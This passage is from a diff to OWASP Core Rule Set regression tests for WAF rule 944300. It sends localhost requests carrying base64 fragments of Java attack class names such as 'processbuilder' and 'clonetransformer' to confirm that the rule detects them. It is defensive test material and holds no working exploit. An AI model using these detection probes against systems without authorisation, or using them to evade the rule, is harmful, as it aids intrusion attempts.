"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HByb2Nlc3NidWlsZGVy" + output: + log: + expect_ids: [944300] + - test_id: 54 desc: "Content-Type application/json arg value includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"HByb2Nlc3NidWlsZGVy\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-55 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"HByb2Nlc3NidWlsZGVy\"}" + output: + log: + expect_ids: [944300] + - test_id: 55 desc: "Content-Type application/json arg name includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"HByb2Nlc3NidWlsZGVy\": \"test\"}" - output: - log_contains: "id 
\"944300\"" - - test_title: 944300-56 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"HByb2Nlc3NidWlsZGVy\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 56 desc: "Argument test includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bwcm9jZXNzYnVpbGRlcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-57 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bwcm9jZXNzYnVpbGRlcg" + output: + log: + expect_ids: [944300] + - test_id: 57 desc: "Argument name includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm9jZXNzYnVpbGRlcg=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-58 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm9jZXNzYnVpbGRlcg=test" + output: + log: + expect_ids: [944300] + - test_id: 58 desc: "Cookie test includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Bwcm9jZXNzYnVpbGRlcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-59 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bwcm9jZXNzYnVpbGRlcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 59 desc: "Cookie name includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Bwcm9jZXNzYnVpbGRlcg=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-60 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bwcm9jZXNzYnVpbGRlcg=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 60 desc: "Request header test includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Bwcm9jZXNzYnVpbGRlcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-61 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bwcm9jZXNzYnVpbGRlcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 61 desc: 
"XML attribute value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-62 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 62 desc: "XML element value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm9jZXNzYnVpbGRlcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-63 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm9jZXNzYnVpbGRlcg" 
+ output: + log: + expect_ids: [944300] + - test_id: 63 desc: "Nested XML element value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm9jZXNzYnVpbGRlcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-64 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm9jZXNzYnVpbGRlcg" + output: + log: + expect_ids: [944300] + - test_id: 64 desc: "Content-Type text/plain includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bwcm9jZXNzYnVpbGRlcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-65 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + 
method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bwcm9jZXNzYnVpbGRlcg" + output: + log: + expect_ids: [944300] + - test_id: 65 desc: "Content-Type application/json arg value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Bwcm9jZXNzYnVpbGRlcg\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-66 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Bwcm9jZXNzYnVpbGRlcg\"}" + output: + log: + expect_ids: [944300] + - test_id: 66 desc: "Content-Type application/json arg name includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Bwcm9jZXNzYnVpbGRlcg\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-67 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Bwcm9jZXNzYnVpbGRlcg\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 67 desc: "Argument test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-68 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 68 desc: "Argument name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Y2xvbmV0cmFuc2Zvcm1lcg=test" - output: - log_contains: "id 
\"944300\"" - - test_title: 944300-69 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Y2xvbmV0cmFuc2Zvcm1lcg=test" + output: + log: + expect_ids: [944300] + - test_id: 69 desc: "Cookie test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Y2xvbmV0cmFuc2Zvcm1lcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-70 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Y2xvbmV0cmFuc2Zvcm1lcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 70 desc: "Cookie name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Y2xvbmV0cmFuc2Zvcm1lcg=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-71 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Y2xvbmV0cmFuc2Zvcm1lcg=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 71 desc: "Request header test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Y2xvbmV0cmFuc2Zvcm1lcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-72 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Y2xvbmV0cmFuc2Zvcm1lcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 72 desc: "XML attribute value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-73 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 73 desc: "XML element value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Y2xvbmV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-74 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 74 desc: "Nested XML element value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: 
- - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Y2xvbmV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-75 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 75 desc: "Content-Type text/plain includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-76 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: 
[944300] + - test_id: 76 desc: "Content-Type application/json arg value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Y2xvbmV0cmFuc2Zvcm1lcg\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-77 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Y2xvbmV0cmFuc2Zvcm1lcg\"}" + output: + log: + expect_ids: [944300] + - test_id: 77 desc: "Content-Type application/json arg name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Y2xvbmV0cmFuc2Zvcm1lcg\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-78 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Y2xvbmV0cmFuc2Zvcm1lcg\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 78 desc: "Argument test includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=GNsb25ldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-79 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=GNsb25ldHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 79 desc: "Argument name includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "GNsb25ldHJhbnNmb3JtZXI=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-80 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP 
